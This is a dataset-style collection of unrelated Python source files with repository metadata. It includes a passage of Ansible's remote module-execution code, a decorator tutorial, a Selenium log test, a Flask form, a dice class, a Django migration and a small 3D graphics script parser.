# very deliberately using update here instead of combine_vars, as
# these environment settings should not need to merge sub-dicts
final_environment.update(temp_environment)
final_environment = self._templar.template(final_environment)
return self._connection._shell.env_prefix(**final_environment)
def _early_needs_tmp_path(self):
'''
Determines if a temp path should be created before the action is executed.
'''
return getattr(self, 'TRANSFERS_FILES', False)
def _late_needs_tmp_path(self, tmp, module_style):
'''
Determines if a temp path is required after some early actions have already taken place.
'''
if tmp and "tmp" in tmp:
# tmp has already been created
return False
if not self._connection.has_pipelining or not self._play_context.pipelining or C.DEFAULT_KEEP_REMOTE_FILES or self._play_context.become_method == 'su':
# tmp is necessary to store the module source code
# or we want to keep the files on the target system
return True
if module_style != "new":
# even when conn has pipelining, old style modules need tmp to store arguments
return True
return False
def _make_tmp_path(self):
'''
Create and return a temporary path on a remote box.
'''
basefile = 'ansible-tmp-%s-%s' % (time.time(), random.randint(0, 2**48))
use_system_tmp = False
if self._play_context.become and self._play_context.become_user != 'root':
use_system_tmp = True
tmp_mode = None
if self._play_context.remote_user != 'root' or self._play_context.become and self._play_context.become_user != 'root':
tmp_mode = 0o755
cmd = self._connection._shell.mkdtemp(basefile, use_system_tmp, tmp_mode)
result = self._low_level_execute_command(cmd, sudoable=False)
# error handling on this seems a little aggressive?
if result['rc'] != 0:
if result['rc'] == 5:
output = 'Authentication failure.'
elif result['rc'] == 255 and self._connection.transport in ('ssh',):
if self._play_context.verbosity > 3:
output = u'SSH encountered an unknown error. The output was:\n%s%s' % (result['stdout'], result['stderr'])
else:
output = (u'SSH encountered an unknown error during the connection.'
' We recommend you re-run the command using -vvvv, which will enable SSH debugging output to help diagnose the issue')
elif u'No space left on device' in result['stderr']:
output = result['stderr']
else:
output = ('Authentication or permission failure.'
' In some cases, you may have been able to authenticate and did not have permissions on the remote directory.'
' Consider changing the remote temp path in ansible.cfg to a path rooted in "/tmp".'
' Failed command was: %s, exited with result %d' % (cmd, result['rc']))
if 'stdout' in result and result['stdout'] != u'':
output = output + u": %s" % result['stdout']
raise AnsibleConnectionFailure(output)
try:
rc = self._connection._shell.join_path(result['stdout'].strip(), u'').splitlines()[-1]
except IndexError:
# stdout was empty or just space, set to / to trigger error in next if
rc = '/'
# Catch failure conditions, files should never be
# written to locations in /.
if rc == '/':
raise AnsibleError('failed to resolve remote temporary directory from %s: `%s` returned empty string' % (basefile, cmd))
return rc
def _remove_tmp_path(self, tmp_path):
'''Remove a temporary path we created. '''
if tmp_path and "-tmp-" in tmp_path:
cmd = self._connection._shell.remove(tmp_path, recurse=True)
# If we have gotten here we have a working ssh configuration.
# If ssh breaks we could leave tmp directories out on the remote system.
self._low_level_execute_command(cmd, sudoable=False)
def _transfer_data(self, remote_path, data):
'''
Copies the module data out to the temporary module path.
'''
if isinstance(data, dict):
data = jsonify(data)
afd, afile = tempfile.mkstemp()
afo = os.fdopen(afd, 'w')
try:
data = to_bytes(data, errors='strict')
afo.write(data)
except Exception as e:
#raise AnsibleError("failure encoding into utf-8: %s" % str(e))
raise AnsibleError("failure writing module data to temporary file for transfer: %s" % str(e))
afo.flush()
afo.close()
try:
self._connection.put_file(afile, remote_path)
finally:
os.unlink(afile)
return remote_path
def _remote_chmod(self, mode, path, sudoable=False):
'''
Issue a remote chmod command
'''
cmd = self._connection._shell.chmod(mode, path)
res = self._low_level_execute_command(cmd, sudoable=sudoable)
return res
def _remote_checksum(self, path, all_vars):
'''
Takes a remote checksum and returns 1 if no file
'''
python_interp = all_vars.get('ansible_python_interpreter', 'python')
cmd = self._connection._shell.checksum(path, python_interp)
data = self._low_level_execute_command(cmd, sudoable=True)
try:
data2 = data['stdout'].strip().splitlines()[-1]
if data2 == u'':
# this may happen if the connection to the remote server
# failed, so just return "INVALIDCHECKSUM" to avoid errors
return "INVALIDCHECKSUM"
else:
return data2.split()[0]
except IndexError:
display.warning(u"Calculating checksum failed unusually, please report this to "
u"the list so it can be fixed\ncommand: %s\n----\noutput: %s\n----\n" % (to_unicode(cmd), data))
# this will signal that it changed and allow things to keep going
return "INVALIDCHECKSUM"
def _remote_expand_user(self, path):
''' takes a remote path and performs tilde expansion on the remote host '''
if not path.startswith('~'): # FIXME: Windows paths may start with "~ instead of just ~
return path
# FIXME: Can't use os.path.sep for Windows paths.
split_path = path.split(os.path.sep, 1)
expand_path = split_path[0]
if expand_path == '~':
if self._play_context.become and self._play_context.become_user:
expand_path = '~%s' % self._play_context.become_user
cmd = self._connection._shell.expand_user(expand_path)
data = self._low_level_execute_command(cmd, sudoable=False)
#initial_fragment = utils.last_non_blank_line(data['stdout'])
initial_fragment = data['stdout'].strip().splitlines()[-1]
if not initial_fragment:
# Something went wrong trying to expand the path remotely. Return
# the original string
return path
if len(split_path) > 1:
return self._connection._shell.join_path(initial_fragment, *split_path[1:])
else:
return initial_fragment
def _filter_leading_non_json_lines(self, data):
'''
Used to avoid random output from SSH at the top of JSON output, like messages from
tcagetattr, or where dropbear spews MOTD on every single command (which is nuts).
        We need to filter out any leading lines that do not start with '{' or '['.
        Only leading lines are filtered, since multiline JSON is valid.
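        Illustrative example (hypothetical MOTD noise from the remote shell):
            'Welcome to host01\n{"changed": false}\n'  ->  '{"changed": false}\n'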
'''
idx = 0
for line in data.splitlines(True):
if line.startswith((u'{', u'[')):
break
idx = idx + len(line)
return data[idx:]
def _execute_module(self, module_name=None, module_args=None, tmp=None, task_vars=None, persist_files=False, delete_remote_tmp=True):
'''
Transfer and run a module along with its arguments.
'''
if task_vars is None:
task_vars = dict()
# if a module name was not specified for this execution, use
# the action from the task
if module_name is None:
module_name = self._task.action
if module_args is None:
module_args = self._task.args
# set check mode in the module arguments, if required
if self._play_context.check_mode and not self._task.always_run:
if not self._supports_check_mode:
raise AnsibleError("check mode is not supported for this operation")
module_args['_ansible_check_mode'] = True
# set no log in the module arguments, if required
if self._play_context.no_log or C.DEFAULT_NO_TARGET_SYSLOG:
module_args['_ansible_no_log'] = True
# set debug in the module arguments, if required
if C.DEFAULT_DEBUG:
module_args['_ansible_debug'] = True
(module_style, shebang, module_data) = self._configure_module(module_name=module_name, module_args=module_args, task_vars=task_vars)
if not shebang:
raise AnsibleError("module is missing interpreter line")
# a remote tmp path may be necessary and not already created
remote_module_path = None
args_file_path = None
if not tmp and self._late_needs_tmp_path(tmp, module_style):
tmp = self._make_tmp_path()
if tmp:
remote_module_filename = self._connection._shell.get_remote_filename(module_name)
remote_module_path = self._connection._shell.join_path(tmp, remote_module_filename)
if module_style in ['old', 'non_native_want_json']:
# we'll also need a temp file to hold our module arguments
args_file_path = self._connection._shell.join_path(tmp, 'args')
if remote_module_path or module_style != 'new':
display.debug("transferring module to remote")
self._transfer_data(remote_module_path, module_data)
if module_style == 'old':
# we need to dump the module args to a k=v string in a file on
# the remote system, which can be read and parsed by the module
args_data = ""
for k,v in iteritems(module_args):
args_data += '%s="%s" ' % (k, pipes.quote(text_type(v)))
self._transfer_data(args_file_path, args_data)
elif module_style == 'non_native_want_json':
self._transfer_data(args_file_path, json.dumps(module_args))
display.debug("done transferring module to remote")
environment_string = self._compute_environment_string()
if tmp and "tmp" in tmp and self._play_context.become and self._play_context.become_user != 'root':
# deal with possible umask issues once sudo'ed to other user
self._remote_chmod('a+r', remote_module_path)
cmd = ""
in_data = None
if self._connection.has_pipelining and self._play_context.pipelining and not C.DEFAULT_KEEP_REMOTE_FILES:
in_data = module_data
else:
if remote_module_path:
cmd = remote_module_path
rm_tmp = None
if tmp and "tmp" in tmp and not C.DEFAULT_KEEP_REMOTE_FILES and not persist_files and delete_remote_tmp:
if not self._play_context.become or self._play_context.become_user == 'root':
# not sudoing or sudoing to root, so can cleanup files in the same step
rm_tmp = tmp
cmd = self._connection._shell.build_module_command(environment_string, shebang, cmd, arg_path=args_file_path, rm_tmp=rm_tmp)
cmd = cmd.strip()
sudoable = True
if module_name == "accelerate":
# always run the accelerate module as the user
# specified in the play, not the sudo_user
sudoable = False
res = self._low_level_execute_command(cmd, sudoable=sudoable, in_data=in_data)
if tmp and "tmp" in tmp and not C.DEFAULT_KEEP_REMOTE_FILES and not persist_files and delete_remote_tmp:
if self._play_context.become and self._play_context.become_user != 'root':
# not sudoing to root, so maybe can't delete files as that other user
# have to clean up temp files as original user in a second step
cmd2 = self._connection._shell.remove(tmp, recurse=True)
self._low_level_execute_command(cmd2, sudoable=False)
try:
data = json.loads(self._filter_leading_non_json_lines(res.get('stdout', u'')))
except ValueError:
# not valid json, lets try to capture error
data = dict(failed=True, parsed=False)
if 'stderr' in res and res['stderr'].startswith(u'Traceback'):
data['exception'] = res['stderr']
else:
data['msg'] = "MODULE FAILURE"
data['module_stdout'] = res.get('stdout', u'')
if 'stderr' in res:
data['module_stderr'] = res['stderr']
# pre-split stdout into lines, if stdout is in the data and there
# isn't already a stdout_lines value there
if 'stdout' in data and 'stdout_lines' not in data:
data['stdout_lines'] = data.get('stdout', u'').splitlines()
display.debug("done with _execute_module (%s, %s)" % (module_name, module_args))
return data
def _low_level_execute_command(self, cmd, sudoable=True, in_data=None,
executable=None, encoding_errors='replace'):
'''
This is the function which executes the low level shell command, which
may be commands to create/remove directories for temporary files, or to
run the module code or python directly when pipelining.
:kwarg encoding_errors: If the value returned by the command isn't
utf-8 then we have to figure out how to transform it to unicode.
If the value is just going to be displayed to the user (or
discarded) then the default of 'replace' is fine. If the data is
used as a key or is going to be written back out to a file
verbatim, then this won't work. May have to use some sort of
replacement strategy (python3 could use surrogateescape)
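        Illustrative call (assumed command, for documentation only):
            res = self._low_level_execute_command('echo $HOME', sudoable=False)
            # res is a dict with 'rc', 'stdout', 'stdout_lines' and 'stderr' keys.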
'''
if executable is not None:
cmd = executable + ' -c ' + cmd
display.debug("_low_level_execute_command(): starting")
if not cmd:
# this can happen with powershell modules when there is no analog to a Windows command (like chmod)
display.debug("_low_level_execute_command(): no command, exiting")
return dict(stdout='', stderr='')
allow_same_user = C.BECOME_ALLOW_SAME_USER
same_user = self._play_context.become_user == self._play_context.remote_user
if sudoable and self._play_context.become and (allow_same_user or not same_user):
display.debug("_low_level_execute_command(): using become for this command")
cmd = self._play_context.make_become_cmd(cmd, executable=executable)
display.debug("_low_level_execute_command(): executing: %s" % (cmd,))
rc, stdout, stderr = self._connection.exec_command(cmd, in_data=in_data, sudoable=sudoable)
# stdout and stderr may be either a file-like or a bytes object.
# Convert either one to a text type
if isinstance(stdout, binary_type):
out = to_unicode(stdout, errors=encoding_errors)
elif not isinstance(stdout, text_type):
out = to_unicode(b''.join(stdout.readlines()), errors=encoding_errors)
else:
out = stdout
if isinstance(stderr, binary_type):
err = to_unicode(stderr, errors=encoding_errors)
elif not isinstance(stderr, text_type):
err = to_unicode(b''.join(stderr.readlines()), errors=encoding_errors)
else:
err = stderr
if rc is None:
rc = 0
display.debug("_low_level_execute_command() done: rc=%d, stdout=%s, stderr=%s" % (rc, stdout, stderr))
return dict(rc=rc, stdout=out, stdout_lines=out.splitlines(), stderr=err)
def _get_first_available_file(self, faf, of=None, searchdir='files'):
display.deprecated("first_available_file, use with_first_found or lookup('first_found',...) instead")
for fn in faf:
fnt = self._templar.template(fn)
if self._task._role is not None:
lead = self._task._role._role_path
else:
lead = fnt
fnd = self._loader.path_dwim_relative(lead, searchdir, fnt)
if not os.path.exists(fnd) and of is not None:
if self._task._role is not None:
lead = self._task._role._role_path
else:
lead = of
fnd = self._loader.path_dwim_relative(lead, searchdir, of)
if os.path.exists(fnd):
return fnd
return None
def _get_diff_data(self, destination, source, task_vars, source_file=True):
diff = {}
display.debug("Going to peek to see if file has changed permissions")
peek_result = self._execute_module(module_name='file', module_args=dict(path=destination, diff_peek=True), task_vars=task_vars, persist_files=True)
if not('failed' in peek_result and peek_result['failed']) or peek_result.get('rc', 0) == 0:
if peek_result['state'] == 'absent':
diff['before'] = ''
elif peek_result['appears_binary']:
diff['dst_binary'] = 1
elif peek_result['size'] > C.MAX_FILE_SIZE_FOR_DIFF:
diff['dst_larger'] = C.MAX_FILE_SIZE_FOR_DIFF
else:
display.debug("Slurping the file %s" % source)
dest_result = self._execute_module(module_name='slurp', module_args=dict(path=destination), task_vars=task_vars, persist_files=True)
if 'content' in dest_result:
dest_contents = dest_result['content']
if dest_result['encoding'] == 'base64':
dest_contents = base64.b64decode(dest_contents)
else:
raise AnsibleError("unknown encoding in content option, failed: %s" % dest_result)
diff['before_header'] = destination
diff['before'] = dest_contents
if source_file:
display.debug("Reading local copy of the file %s" % source)
try:
src = open(source)
src_contents = src.read(8192)
st = os.stat(source)
except Exception as e:
raise AnsibleError("Unexpected error while reading source (%s) for diff: %s " % (source, str(e)))
if "\x00" in src_contents:
diff['src_binary'] = 1
elif st[stat.ST_SIZE] > C.MAX_FILE_SIZE_FOR_DIFF:
diff['src_larger'] = C.MAX_FILE_SIZE_FOR_DIFF
else:
diff['after_header'] = source
diff['after'] = src_contents
else:
display.debug("source of file passed in")
diff['after_header'] = 'dynamically generated'
diff['after'] = source
return diff
| [
"[email protected]"
] | |
c8f4bb67eb5023fb6754b7accaaecaa3d3c89059 | b7312dc013ba06e5b44b33c0411f4948c4794346 | /study4/decorator3.py | 866d868685ac97384a6c6229bf76635ac05af61f | [] | no_license | GaoFuhong/python-code | 50fb298d0c1e7a2af55f1e13e48063ca3d1a189f | 7d17c98011e5a1e74d49332da9f87f5cb576822d | refs/heads/master | 2021-02-07T20:25:06.997173 | 2020-03-01T02:22:41 | 2020-03-01T02:26:04 | 244,072,971 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 947 | py | # Author:Fuhong Gao
# Nested functions
# def foo():
# print("in the foo...")
# def bar():
# print("in the bar...")
# bar()
# foo()
# A simple decorator (note: when defining the decorated functions, avoid reusing names like test1, test2, ... or it is easy to make mistakes)
import time
def timer(func):  # the decorated function (fun1 / fun2) is passed in as func
    # define an inner wrapper function (a "variable" holding the wrapper)
def deco(*args,**kwargs):
start_time = time.time()
func(*args,**kwargs)
stop_time = time.time()
print("the func running time is %s" %(stop_time - start_time))
    return deco  # return the inner function object (its name)
@timer  # equivalent to: fun1 = timer(fun1); add @timer above any function that should use the decorator
def fun1():  # no parameters
time.sleep(1)
print("in the test1...")
@timer  # fun2 = timer(fun2), so calling fun2(name, age) actually calls deco(name, age)
def fun2(name,age):  # with parameters
time.sleep(1)
print("name:",name,"age:",age)
fun1()
fun2("gfh",22) | [
"[email protected]"
] | |
62b6f24a18c8dc7368fbaa3d566c57711600b466 | e2e08d7c97398a42e6554f913ee27340226994d9 | /pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_LOG/test_c142794.py | 1fff26fd926e1ae41c0fb8a21027628e495f9ba9 | [] | no_license | lizhuoya1111/Automated_testing_practice | 88e7be512e831d279324ad710946232377fb4c01 | b3a532d33ddeb8d01fff315bcd59b451befdef23 | refs/heads/master | 2022-12-04T08:19:29.806445 | 2020-08-14T03:51:20 | 2020-08-14T03:51:20 | 287,426,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,709 | py | import pytest
import time
import sys
from os.path import dirname, abspath
sys.path.insert(0, dirname(dirname(abspath(__file__))))
from page_obj.scg.scg_def_physical_interface import *
from page_obj.scg.scg_def_vlan_interface import *
from page_obj.scg.scg_def_bridge import *
from page_obj.common.rail import *
from page_obj.scg.scg_def_log import *
from page_obj.common.ssh import *
from page_obj.scg.scg_def_dhcp import *
from page_obj.scg.scg_dev import *
from page_obj.scg.scg_def_ifname_OEM import *
from page_obj.scg.scg_def import *
test_id = 142794
def test_c142794(browser):
try:
login_web(browser, url=dev1)
add_email_alarm_jyl(browser, enable="yes", email_name="email_alert_jia_1", email_add="[email protected]",
cc_email="yes", cc_email_add="[email protected]", format="syslog", project="yes",
project_content="300", disk_full="yes", save="yes")
edit_email_alarm_jyl(browser, email_alert="email_alert_jia_1", format="welf", save="yes")
edit_email_alarm_jyl(browser, email_alert="email_alert_jia_1", format="csv", save="yes")
loginfo = get_log(browser, 管理日志)
# print(loginfo)
delete_email_alarm_server_jyl(browser, email_alarm="email_alert_jia_1")
try:
assert "配置 [EMAIL ALERT]对象成功" in loginfo
rail_pass(test_run_id, test_id)
except:
rail_fail(test_run_id, test_id)
assert "配置 [EMAIL ALERT]对象成功" in loginfo
except Exception as err:
        # If any of the steps above raised an error, reset the device to restore the configuration
print(err)
reload(hostip=dev1)
rail_fail(test_run_id, test_id)
assert False
if __name__ == '__main__':
pytest.main(["-v", "-s", "test_c" + str(test_id) + ".py"])
| [
"[email protected]"
] | |
eed1238d3a0fd05c591f3ee36a20a12e4ab9be07 | 74bf86f99cc75006716edf5e25b040d1265ea134 | /forms.py | ae87ae5091d5c25ebab6d13b38b9d4a2d40c1c31 | [] | no_license | guoweikuang/flask_blog | 65ed13c9660e699d4ec3b01212c6dcd41bb7e5d9 | 1292918b81029fd5b149486d8a8478fc02b92618 | refs/heads/master | 2022-12-09T05:46:17.093246 | 2017-07-12T15:28:27 | 2017-07-12T15:28:27 | 94,674,289 | 0 | 0 | null | 2022-12-07T23:59:57 | 2017-06-18T08:15:43 | JavaScript | UTF-8 | Python | false | false | 623 | py | # -*- coding: utf-8 -*-
import re
from flask_wtf import FlaskForm
from wtforms import StringField, TextField
from wtforms import ValidationError
from wtforms.validators import DataRequired, Length
def custom_email(form_object, field_object):
"""自定义检验器,邮箱格式检验"""
if not re.match(r"[^@+@[^@]+\.[^@]]+", field_object):
raise ValidationError(u'邮箱地址格式不对!!!')
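# Illustrative use of the validator above (assumed field, not part of the original form):
#     email = StringField(u'Email', validators=[DataRequired(), custom_email])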
class CommentForm(FlaskForm):
"""评论表单"""
name = StringField(u'名字', validators=[DataRequired(), Length(max=255)])
text = TextField(u"内容", validators=[DataRequired()])
| [
"[email protected]"
] | |
44886b5540adf62e789a3e14c8bdb407164c6454 | fc6bc4cf23f713e3e4a97c00f724c977b3adbf82 | /venv/Scripts/rst2html4.py | cea8afb9d0e6e8c96822dd5798e93d5ce73aa0b3 | [] | no_license | Startrekker007/SInglePhotons | 8b429e29f78977adfa7711e8dae2cb864a13ea53 | 529c2ab3ea3c3797db4dd4e0a336ce35ea2e64a1 | refs/heads/master | 2022-12-12T16:38:56.412370 | 2020-02-04T00:19:57 | 2020-02-04T00:19:57 | 223,832,514 | 2 | 2 | null | 2022-12-08T09:25:43 | 2019-11-25T00:41:41 | VHDL | UTF-8 | Python | false | false | 738 | py | #!D:\SInglePhotons\venv\Scripts\python.exe
# $Id: rst2html4.py 7994 2016-12-10 17:41:45Z milde $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing (X)HTML.
The output conforms to XHTML 1.0 transitional
and almost to HTML 4.01 transitional (except for closing empty tags).
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates (X)HTML documents from standalone reStructuredText '
'sources. ' + default_description)
publish_cmdline(writer_name='html4', description=description)
| [
"[email protected]"
] | |
74d32a699bdd95a5f76f5892163733b31d4f7216 | e203ddace08580170e3b4de9c79588209e857c1c | /dice.py | abdae853c875404a92648d58684acab4c6db318b | [] | no_license | stradtkt/OOPTreehouse-Python | e17f3fd48840049b8b741aa0e30e54d1409804b2 | 84e0ef2142118bf44c416a3b1dde3519ff57fd15 | refs/heads/main | 2023-02-26T15:03:27.053205 | 2021-02-04T13:04:26 | 2021-02-04T13:04:26 | 334,620,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 935 | py | import random
class Die:
def __init__(self, sides=2, value=0):
        # validate the type first so non-numeric input gets the clearer error message
        if not isinstance(sides, int):
            raise ValueError("Sides must be a whole number")
        if not sides >= 2:
            raise ValueError("Must have at least 2 sides")
self.value = value or random.randint(1, sides)
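        # Note: with the default value=0 the `or` falls through, so a fresh random
        # roll between 1 and `sides` is generated automatically.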
def __int__(self):
return self.value
def __eq__(self, other):
return int(self) == other
def __ne__(self, other):
return int(self) != other
def __gt__(self, other):
return int(self) > other
def __lt__(self, other):
return int(self) < other
def __ge__(self, other):
        return int(self) >= other
    def __le__(self, other):
        return int(self) <= other
def __repr__(self):
return str(self.value)
class D6(Die):
def __init__(self, value=0):
super().__init__(sides=6, value=value) | [
"[email protected]"
] | |
b99a5769e37c7e91afb7a10ecf5019595817fcd5 | 09120532659f7eb134163f92ac2f65423a04dc03 | /zproject/django/survey/teacher/migrations/0006_remove_question_page.py | b68e92589867082131f7e2af6969e05cc1c2cfca | [] | no_license | hoboland21/survey | 7b2dafd76db0e9317037a0cec163a97c0ec9a8ec | 93e71f3304b381a6be03c8f813d2ba3a0b6eb218 | refs/heads/master | 2023-01-28T07:38:38.934710 | 2019-05-13T08:55:41 | 2019-05-13T08:55:41 | 182,874,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 328 | py | # Generated by Django 2.2.1 on 2019-05-13 07:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('teacher', '0005_auto_20190502_0008'),
]
operations = [
migrations.RemoveField(
model_name='question',
name='page',
),
]
| [
"[email protected]"
] | |
73d0e57e7a4ce436b64584786aa7f686d7c5f0a8 | 3f2cc3d386ad184ca759a3fda072e35fa74baa09 | /artic/deprecated/lengths.py | 3d744e4898050bc511ac8f4f3de7b00f62f9de06 | [
"MIT"
] | permissive | artic-network/fieldbioinformatics | de91b5175b484f006ce15c0ef5607cb34f22954e | 314f52bcdd22faf827b7471086e97c196cc38c8f | refs/heads/master | 2023-09-01T17:50:54.222480 | 2023-08-22T12:20:05 | 2023-08-22T12:20:05 | 122,982,368 | 98 | 74 | MIT | 2023-09-08T16:37:07 | 2018-02-26T14:37:14 | Python | UTF-8 | Python | false | false | 124 | py | #!/usr/bin/env python
import sys
from Bio import SeqIO
for rec in SeqIO.parse(sys.stdin, "fasta"): print rec.id, len(rec)
| [
"[email protected]"
] | |
0a2d611f2578b26b114f89d0df16482b4e00844f | 37b2998b537673f0b2b0237887fe3ab1b4c525d1 | /workbench/offers/migrations/0002_offer_project.py | 0ced7448d48e952a677f636985a60ce7075c79c0 | [
"MIT"
] | permissive | ndarvishev/workbench | 1076fc86522884a3128fab25cd7f6f8162a152f4 | e93c35180990ee3424fbb7b73e26400cb869e29a | refs/heads/main | 2023-05-30T23:47:36.948646 | 2021-06-25T08:43:15 | 2021-06-25T08:43:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | # Generated by Django 2.1.7 on 2019-03-04 21:39
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [("projects", "0001_initial"), ("offers", "0001_initial")]
operations = [
migrations.AddField(
model_name="offer",
name="project",
field=models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="offers",
to="projects.Project",
verbose_name="project",
),
)
]
| [
"[email protected]"
] | |
dbadb79e1a21ae2572a427526517b255f2b2e995 | 2b25aae9266437b657e748f3d6fea4db9e9d7f15 | /graphics/3d/8/Andreas_Wang/parser.py | 6a3bff914ce674c14def05ef60a827e30890a319 | [] | no_license | Zilby/Stuy-Stuff | b1c3bc23abf40092a8a7a80e406e7c412bd22ae0 | 5c5e375304952f62667d3b34b36f0056c1a8e753 | refs/heads/master | 2020-05-18T03:03:48.210196 | 2018-11-15T04:50:03 | 2018-11-15T04:50:03 | 24,191,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,670 | py | from display import *
from matrix import *
from draw import *
from math import *
from types import *
# I had a neurotic need for everything to match the math notation of
# matrices being defined as rows x columns, so my matrix items I read
# as matrix[row][column]
# Since this would mean our point matrix is an n by 4 matrix,
# not a 4 by n matrix, in order to make this work, I flipped...
# everything. So every single transformation is... flipped.
# As is the order of the multiplication (I do points x transform).
# Fortunately this only means my transform matrix is flipped along
# a diagonal and should only be mildly instead of hair-wrenchingly confusing.
# Enjoy!
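# Illustrative consequence of the flipped (points-on-the-left) layout: a translation
# ends up in the last *row* of the matrix (transform[3][n] += p[n] below), and points
# are multiplied as points x transform instead of transform x points.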
def parse_file( fname, points, transform ):
screen = new_screen()
color = [ 0, 255, 0 ]
f = open(fname, "r")
line = f.readline().strip()
while line:
if line == "l":
p = []
for x in f.readline().strip().split(' '):
p.append(int(x))
add_edge(points, p[0], p[1], p[2], p[3], p[4], p[5])
elif line == "i":
for x in range(4):
for y in range(4):
transform[x][y] = 0
transform[x][x] = 1
elif line == "s":
p = []
for x in f.readline().strip().split():
p.append(float(x))
for n in range(3):
transform[n][n] *= p[n]
elif line == "t":
p = []
for x in f.readline().strip().split():
p.append(int(x))
for n in range(3):
transform[3][n] += p[n]
elif line == "c":
p = []
for x in f.readline().strip().split():
p.append(float(x))
make_circle(points, p[0], p[1], p[2])
elif line == "h":
p = []
for x in f.readline().strip().split():
p.append(float(x))
make_spline(points, "hermite",p)
elif line == "b":
p = []
for x in f.readline().strip().split():
p.append(float(x))
make_spline(points, "bezier",p)
elif line == "w":
points = new_matrix()
elif line == "p":
p = []
for x in f.readline().strip().split():
p.append(int(x))
make_prism(points, p[0], p[1], p[2], p[3], p[4], p[5])
elif line =="m":
p = []
for x in f.readline().strip().split():
p.append(int(x))
make_sphere(points, p[0], p[1], p[2])
elif line =="d":
p = []
for x in f.readline().strip().split():
p.append(int(x))
make_torus(points, p[0], p[1], p[2], p[3])
elif line == "x":
transform = rotate("x", f.readline().strip(), points, transform)
elif line == "y":
transform = rotate("y", f.readline().strip(), points, transform)
elif line == "z":
transform = rotate("z", f.readline().strip(), points, transform)
elif line == "a":
#print "transform: "
#print_matrix(transform)
points = mult(points, transform, True)
elif line == "v":
clear_screen(screen)
draw_lines( points, screen, color )
display(screen)
elif line == "g":
            save_ppm(screen, f.readline().strip())
display(screen)
line = f.readline().strip()
#print_matrix( points)
f.close()
def rotate(axis, theta, points, transform):
theta = float(theta) * pi / 180
#print cos(theta)
if axis == "x":
t = new_matrix()
t[0][0] = 1
t[1][1] = cos(theta)
t[1][2] = sin(theta)
t[2][1] = -1.0 * sin(theta)
t[2][2] = cos(theta)
elif axis == "y":
t = new_matrix()
t[1][1] = 1
t[0][0] = cos(theta)
t[0][2] = -1.0 * sin(theta)
t[2][0] = sin(theta)
t[2][2] = cos(theta)
elif axis == "z":
t = new_matrix()
t[2][2] = 1
t[0][0] = cos(theta)
t[0][1] = sin(theta)
t[1][0] = -1.0 * sin(theta)
t[1][1] = cos(theta)
t[3][3] = 1
#print_matrix(t)
#print_matrix(transform)
transform = mult(t, transform, False)
#print_matrix(transform)
return transform
def make_prism(points, x, y, z, w, h, d):
add_edge(points, x, y, z, x, y, z)
add_edge(points, x, y, z - d, x, y, z - d)
add_edge(points, x, y - h, z, x, y - h, z)
add_edge(points, x, y - h, z - d, x, y - h, z - d)
add_edge(points, x + w, y, z, x + w, y, z)
add_edge(points, x + w, y, z - d, x + w, y, z - d)
add_edge(points, x + w, y - h, z, x + w, y - h, z)
add_edge(points, x + w, y - h, z - d, x + w, y - h, z - d)
def make_sphere(points, x0, y0, r):
z0 = 0
for a in range(100):
for b in range(100):
theta = a / 100.0 * pi * 2.0
phi = b / 100.0 * pi
x = x0 + int(r * cos(theta) * sin(phi))
y = y0 + int(r * sin(theta) * sin(phi))
z = z0 + int(r * cos(phi))
add_edge(points, x, y, z, x, y,z)
def make_torus(points, x0, y0, r, R):
z0 = 0
for a in range(100):
for b in range(100):
theta = a / 100.0 * pi * 2.0
phi = b / 100.0 * pi * 2.0
x = x0 + int(cos(phi) * (r * cos(theta) + R))
y = y0 + int(r * sin(theta))
z = z0 + int(-1.0 * sin(phi) * (r * cos(theta) + R))
add_edge(points, x, y, z, x, y,z)
points = []
transform = new_matrix(4,4)
parse_file( 'script_c', points, transform )
| [
"[email protected]"
] | |
8741b9aed2a4193f98da42908af3309846ac847d | 23805cffc86ac4dfb5bcce672b8c7070b4616e41 | /Apprendre-Python/is-prime/scripts/generate.py | 6c3f901f4ee05d4b2bf8c0c39ea1473a1f97b3d0 | [] | no_license | ukonline/pythia-tasks | f90ff90299fe0eedd0e2787bcf666df07c709a00 | 81a3731eb0cdfe16b26a4e75a165a5071fb48ff5 | refs/heads/master | 2021-01-25T03:26:33.915795 | 2016-01-04T20:03:24 | 2016-01-04T20:03:24 | 40,974,655 | 0 | 2 | null | 2016-12-21T13:12:14 | 2015-08-18T13:49:39 | Python | UTF-8 | Python | false | false | 467 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# Course: Apprendre Python
# Problem: Es-tu premier ?
# Test generation script
import csv
import json
import os
import sys
sys.path.append('/task/static')
from lib import pythia
# Read test configuration and generate test data
with open('/task/config/test.json', 'r', encoding='utf-8') as file:
content = file.read()
config = json.loads(content)
pythia.generateTestData('/tmp/work/input', 'data.csv', config)
| [
"[email protected]"
] | |
ffbc110b9951442796efd9600d9055a83d244b5b | 818c7b09d7e264c130a849f86dabaa3d43656870 | /pycharm学习-基础篇/python基础知识/test.py | 763515ace02b3a729f53fe1e69b0baed1afca1d0 | [] | no_license | rishinkaku/python_course | b89d51b38f64248e074ba66230353b1b335475ab | 6a2f2c175c863776a0e1125a8359a8ea97b95456 | refs/heads/master | 2020-03-28T11:50:20.231058 | 2018-08-29T13:01:59 | 2018-08-29T13:01:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | a=[1,2,3]
def run(n):
for i in n:
print(i)
if i<3:
return 'yes'
r=run(a)
print(r) | [
"[email protected]"
] | |
